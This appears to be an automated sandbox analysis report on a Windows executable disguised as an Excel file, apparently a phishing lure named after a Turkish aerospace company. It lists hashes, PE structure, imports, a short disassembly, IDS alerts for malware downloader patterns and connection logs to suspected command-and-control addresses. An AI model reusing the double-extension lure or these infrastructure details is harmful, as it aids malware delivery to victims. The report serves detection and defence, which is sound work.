                                                                                                                                  SHA-512:5B2049D90942B03C0025782877A8AE77C8738F7DB1D5CB6268FE7046901B8108A28D9D7A38C28FFC09624DCB162CF6C0072CA6A77853F1A5DF75288ECC9871C8
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:...0217D]L3U..9D.3KJOLAUp117DYL3URY9D43KJOLAU0117DYL3URY9D43.JOLOJ.?1.M.m.T....\Z8j?>.2BP\.'8"]:&y[!.A>$o%/ut~b.)6(V{_T3`43KJOLA.u11{EZL...?9D43KJOL.U20:6.YL)QRY-D43KJO.yQ01.7DY.7URYyD4.KJONAU4117DYL3QRY9D43KJ.HAU2117DYL1U..9D$3KZOLAU 11'DYL3URI9D43KJOLAU09.3D.L3UR.=D##KJOLAU0117DYL3URY9DT7KFOLAU0117DYL3URY9D43KJOLAU0117DYL3URY9D43KJOLAU0117DYl3UZY9D43KJOLAU8.17.YL3URY9D43Kd;)9!011S\]L3uRY9^03KHOLAU0117DYL3URy9DT.99=/AU0&!7DY.7URK9D4/OJOLAU0117DYL3.RYyjFV'%,LAY0117$]L3WRY9j03KJOLAU0117DY.3U.Y9D43KJOLAU0117D.t7URY9D|3KJMLDU..374.M3VRY9.43M..NA.0117DYL3URY9D43KJOLAU0117DYL3URY9D43KJOLAU0.L.K...<!..D43KJOMCV479?DYL3URY9:43K.OLA.011.DYL.URYTD43oJOL?U01O7DY(3UR+9D4RKJO.AU0^17D7L3U,Y9D*1cjOLK..13.eYL9Ux.Jf43A.NLAQC.17N.N3UV*.D49.IOLE&.11=.]L3Q!.9D>.NJOHk.02.!BYL(:kY9N40._ILAN..15lcL3_Rs.D7.^LOLZ..13.MYL7..*$D45c.OLK!9115.SL3QxG;lp3K@en?^015.DsnMYRY=o4.i4BLAQ.1.)F.A3UVs.::3KNdLkwN>17@rL.KP.6D47ah1\AU4.1.f']3UVr9n.MYJOHjU..O$DYH.Ux{GP43OaOfc+%113oYf.+DY9@.3ah1[AU4.1.f'T3UVr9n*1.ROLE.6.S76.Y3%Q
                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Entropy (8bit):7.016512045433539
                                                                                                                                  TrID:
                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                  File name:TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
                                                                                                                                  File size:1'029'120 bytes
                                                                                                                                  MD5:e984d47ddddd227739d93d4712eec8fa
                                                                                                                                  SHA1:c10c8fbb4afc6d0ec5754ee95cfd4b3e4df4b3f8
                                                                                                                                  SHA256:1349316e7a40b141bed9b55a8271d86434e168ff6efd248c1fa5af4e05c1c248
                                                                                                                                  SHA512:67c5fe2605be68f0f35193df1186924ee34fe3c1d65909bcdb34def6863f07aa9b444064690080a8e018efae9e1ac08c26442364d1a3e2488ebf932f8e05c643
                                                                                                                                  SSDEEP:24576:cu6J33O0c+JY5UZ+XC0kGso6FacEjfddHksiaZhdcWY:Gu0c++OCvkGs9Facqf/iafY
                                                                                                                                  TLSH:9A25BE22B3DDC360CB669173BF69B3056EBF7C610630B85B2F980D79A950171266C7A3
                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                                                                                                  Icon Hash:3570b480858580c5
                                                                                                                                  Entrypoint:0x427dcd
                                                                                                                                  Entrypoint Section:.text
                                                                                                                                  Digitally signed:false
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  Subsystem:windows gui
                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                  Time Stamp:0x675FC424 [Mon Dec 16 06:09:40 2024 UTC]
                                                                                                                                  TLS Callbacks:
                                                                                                                                  CLR (.Net) Version:
                                                                                                                                  OS Version Major:5
                                                                                                                                  OS Version Minor:1
                                                                                                                                  File Version Major:5
                                                                                                                                  File Version Minor:1
                                                                                                                                  Subsystem Version Major:5
                                                                                                                                  Subsystem Version Minor:1
                                                                                                                                  Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                                                                                                  Instruction
                                                                                                                                  call 00007FE88501226Ah
                                                                                                                                  jmp 00007FE885005034h
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  push edi
                                                                                                                                  push esi
                                                                                                                                  mov esi, dword ptr [esp+10h]
                                                                                                                                  mov ecx, dword ptr [esp+14h]
                                                                                                                                  mov edi, dword ptr [esp+0Ch]
                                                                                                                                  mov eax, ecx
                                                                                                                                  mov edx, ecx
                                                                                                                                  add eax, esi
                                                                                                                                  cmp edi, esi
                                                                                                                                  jbe 00007FE8850051BAh
                                                                                                                                  cmp edi, eax
                                                                                                                                  jc 00007FE88500551Eh
                                                                                                                                  bt dword ptr [004C31FCh], 01h
                                                                                                                                  jnc 00007FE8850051B9h
                                                                                                                                  rep movsb
                                                                                                                                  jmp 00007FE8850054CCh
                                                                                                                                  cmp ecx, 00000080h
                                                                                                                                  jc 00007FE885005384h
                                                                                                                                  mov eax, edi
                                                                                                                                  xor eax, esi
                                                                                                                                  test eax, 0000000Fh
                                                                                                                                  jne 00007FE8850051C0h
                                                                                                                                  bt dword ptr [004BE324h], 01h
                                                                                                                                  jc 00007FE885005690h
                                                                                                                                  bt dword ptr [004C31FCh], 00000000h
                                                                                                                                  jnc 00007FE88500535Dh
                                                                                                                                  test edi, 00000003h
                                                                                                                                  jne 00007FE88500536Eh
                                                                                                                                  test esi, 00000003h
                                                                                                                                  jne 00007FE88500534Dh
                                                                                                                                  bt edi, 02h
                                                                                                                                  jnc 00007FE8850051BFh
                                                                                                                                  mov eax, dword ptr [esi]
                                                                                                                                  sub ecx, 04h
                                                                                                                                  lea esi, dword ptr [esi+04h]
                                                                                                                                  mov dword ptr [edi], eax
                                                                                                                                  lea edi, dword ptr [edi+04h]
                                                                                                                                  bt edi, 03h
                                                                                                                                  jnc 00007FE8850051C3h
                                                                                                                                  movq xmm1, qword ptr [esi]
                                                                                                                                  sub ecx, 08h
                                                                                                                                  lea esi, dword ptr [esi+08h]
                                                                                                                                  movq qword ptr [edi], xmm1
                                                                                                                                  lea edi, dword ptr [edi+08h]
                                                                                                                                  test esi, 00000007h
                                                                                                                                  je 00007FE885005215h
                                                                                                                                  bt esi, 03h
                                                                                                                                  jnc 00007FE885005268h
                                                                                                                                  Programming Language:
                                                                                                                                  • [ASM] VS2013 build 21005
                                                                                                                                  • [ C ] VS2013 build 21005
                                                                                                                                  • [C++] VS2013 build 21005
                                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                                                                  • [ASM] VS2013 UPD4 build 31101
                                                                                                                                  • [RES] VS2013 build 21005
                                                                                                                                  • [LNK] VS2013 UPD4 build 31101
                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x32a58.rsrc
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xfa0000x711c.reloc
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                  .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                  .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                  .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                  .rsrc0xc70000x32a580x32c003749d4297d05ed808fab04e96093e91bFalse0.9559392318349754data7.930009937809749IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                  .reloc0xfa0000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                  RT_ICON0xc74580x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                                                  RT_ICON0xc75800x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                                                  RT_ICON0xc76a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                                  RT_ICON0xc77d00x162cPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.906800563777308
                                                                                                                                  RT_MENU0xc8dfc0x50dataEnglishGreat Britain0.9
                                                                                                                                  RT_STRING0xc8e4c0x594dataEnglishGreat Britain0.3333333333333333
                                                                                                                                  RT_STRING0xc93e00x68adataEnglishGreat Britain0.2747909199522103
                                                                                                                                  RT_STRING0xc9a6c0x490dataEnglishGreat Britain0.3715753424657534
                                                                                                                                  RT_STRING0xc9efc0x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                                  RT_STRING0xca4f80x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                                  RT_STRING0xcab540x466dataEnglishGreat Britain0.3605683836589698
                                                                                                                                  RT_STRING0xcafbc0x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                                                                  RT_RCDATA0xcb1140x2e425data1.0003483272376066
                                                                                                                                  RT_GROUP_ICON0xf953c0x14dataEnglishGreat Britain1.2
                                                                                                                                  RT_GROUP_ICON0xf95500x14dataEnglishGreat Britain1.25
                                                                                                                                  RT_GROUP_ICON0xf95640x14dataEnglishGreat Britain1.15
                                                                                                                                  RT_GROUP_ICON0xf95780x14dataEnglishGreat Britain1.25
                                                                                                                                  RT_VERSION0xf958c0xdcdataEnglishGreat Britain0.6181818181818182
                                                                                                                                  RT_MANIFEST0xf96680x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                                                                                                  DLLImport
                                                                                                                                  WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                                                                                  VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                                                                                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                                  COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                                                                  MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                                                                  WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                                                                                  PSAPI.DLLGetProcessMemoryInfo
                                                                                                                                  IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                                                                  USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                                                                                  UxTheme.dllIsThemeActive
                                                                                                                                  KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                                                                                                  USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                                                                                  GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                                                                                  COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                                                                                                  ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                                                                                  SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                                  ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                                                                                  OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                  EnglishGreat Britain
                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                  2024-12-16T13:37:08.701345+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849705193.122.130.080TCP
                                                                                                                                  2024-12-16T13:37:11.373100+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849705193.122.130.080TCP
                                                                                                                                  2024-12-16T13:37:12.992245+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849707104.21.67.152443TCP
                                                                                                                                  2024-12-16T13:37:14.279449+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849708193.122.130.080TCP
                                                                                                                                  2024-12-16T13:37:15.900329+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849709104.21.67.152443TCP
                                                                                                                                  2024-12-16T13:37:27.957196+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849721104.21.67.152443TCP
                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Dec 16, 2024 13:37:06.772269964 CET4970580192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:06.892482996 CET8049705193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:06.892573118 CET4970580192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:06.892929077 CET4970580192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:07.013078928 CET8049705193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:08.265475035 CET8049705193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:08.272860050 CET4970580192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:08.425751925 CET8049705193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:08.645967007 CET8049705193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:08.701344967 CET4970580192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:09.179127932 CET49706443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:09.179169893 CET44349706104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:09.179229975 CET49706443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:09.312755108 CET49706443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:09.312777042 CET44349706104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:10.531255007 CET44349706104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:10.531384945 CET49706443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:10.537236929 CET49706443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:10.537256956 CET44349706104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:10.537558079 CET44349706104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:10.587120056 CET49706443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:10.631331921 CET44349706104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:10.974216938 CET44349706104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:10.974280119 CET44349706104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:10.974348068 CET49706443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:10.980340004 CET49706443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:10.983530998 CET4970580192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:11.103348970 CET8049705193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:11.325221062 CET8049705193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:11.328367949 CET49707443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:11.328411102 CET44349707104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:11.328496933 CET49707443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:11.328866959 CET49707443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:11.328876019 CET44349707104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:11.373100042 CET4970580192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:12.544233084 CET44349707104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:12.546489000 CET49707443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:12.546499014 CET44349707104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:12.992263079 CET44349707104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:12.992327929 CET44349707104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:12.992394924 CET49707443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:12.992813110 CET49707443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:12.996093988 CET4970580192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:12.997432947 CET4970880192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:13.118316889 CET8049708193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:13.118434906 CET4970880192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:13.118542910 CET4970880192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:13.118592978 CET8049705193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:13.118668079 CET4970580192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:13.238481045 CET8049708193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:14.230257034 CET8049708193.122.130.0192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:14.231736898 CET49709443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:14.231786966 CET44349709104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:14.231858969 CET49709443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:14.232156992 CET49709443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:14.232170105 CET44349709104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:14.279448986 CET4970880192.168.2.8193.122.130.0
                                                                                                                                  Dec 16, 2024 13:37:15.445518970 CET44349709104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:15.448102951 CET49709443192.168.2.8104.21.67.152
                                                                                                                                  Dec 16, 2024 13:37:15.448126078 CET44349709104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:15.900348902 CET44349709104.21.67.152192.168.2.8
                                                                                                                                  Dec 16, 2024 13:37:15.900413990 CET44349709104.21.67.152192.168.2.8
